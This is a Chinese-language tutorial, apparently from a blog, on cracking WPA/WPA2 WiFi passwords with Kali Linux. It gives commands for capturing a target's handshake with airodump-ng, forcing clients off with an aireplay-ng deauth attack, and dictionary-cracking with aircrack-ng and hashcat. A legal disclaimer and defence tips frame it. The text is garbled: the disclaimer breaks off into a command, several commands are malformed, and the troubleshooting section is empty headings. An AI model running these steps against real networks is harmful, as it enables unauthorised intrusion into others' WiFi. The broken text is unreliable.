重要法律与合规声明(必读)
未经网络所有者明确书面授权,破解、入侵、监听他人 WiFi 属于违法行为,违反《网络安全法》《刑法》等相关规定,可能面临民事赔偿、行政处罚乃至刑事责任。以下内容仅用airodump-ng -c6--bssid AA:BB:CC:DD:EE:FF -w ~/Desktop/wpa_handshake wlan1mon -c
6:指定目标信道
--bssid:目标路由器 MAC
-w:保存路径与文件名(生成 .cap 文件)
保持该终端运行,等待客户端连接(被动抓包较慢)
(四)步骤 4:Deauth 攻击(强制获取握手包)
新开一个终端,执行 Deauth 攻击,强制已连接客户端断开并重连:
aireplay-ng -00-a AA:BB:CC:DD:EE:FF -c STATION_MAC wlan1mon
(五)步骤 5:字典破解握手包
方法 A:Aircrack-ng 基础破解
解压 Kali 自带字典(rockyou.txt)
gunzip /usr/share/wordlists/rockyou.txt.gz
执行破解
aircrack-ng -w /usr/share/wordlists/rockyou.txt ~/Desktop/wpa_handshake-01.cap
方法 B:Hashcat 高速破解(推荐,速度提升 10–100 倍)
转换握手包格式(.cap → .hccapx)
hcxpcapngtool ~/Desktop/wpa_handshake-01.cap -o ~/Desktop/wpa.hccapx
Hashcat 破解(GPU 加速,需 NVIDIA/AMD 显卡)
# CPU 破解hashcat -m2500 ~/Desktop/wpa.hccapx /usr/share/wordlists/rockyou.txt# GPU 破解(NVIDIA)hashcat -m2500-d1 ~/Desktop/wpa.hccapx /usr/share/wordlists/rockyou.txt
-m 2500:WPA/WPA2 握手包破解模式
破解成功会显示密码明文
四、常见问题与解决方案
网卡不支持监听模式
airodump-ng 扫描不到 WiFi
抓不到握手包
破解速度慢
五、安全防御建议(从被攻击者角度)
使用 WPA3 加密(替代 WPA2)
设置 16 位以上复杂密码(字母 + 数字 + 符号)
关闭 WPS 功能(易被 PIN 码破解)
隐藏 SSID、启用 MAC 地址过滤
定期修改 WiFi 密码
六、总结
Kali Linux 是 WiFi 安全测试的标准平台,核心流程为:系统安装 → 网卡监听 → 扫描目标 → 捕获握手包 → 字典破解。整个过程依赖硬件(监听网卡)、工具(Aircrack-ng/Hashcat)与合法授权,缺一不可。
再次强调:仅可在自有网络或获得书面授权的环境中操作,遵守法律法规是技术学习的前提。
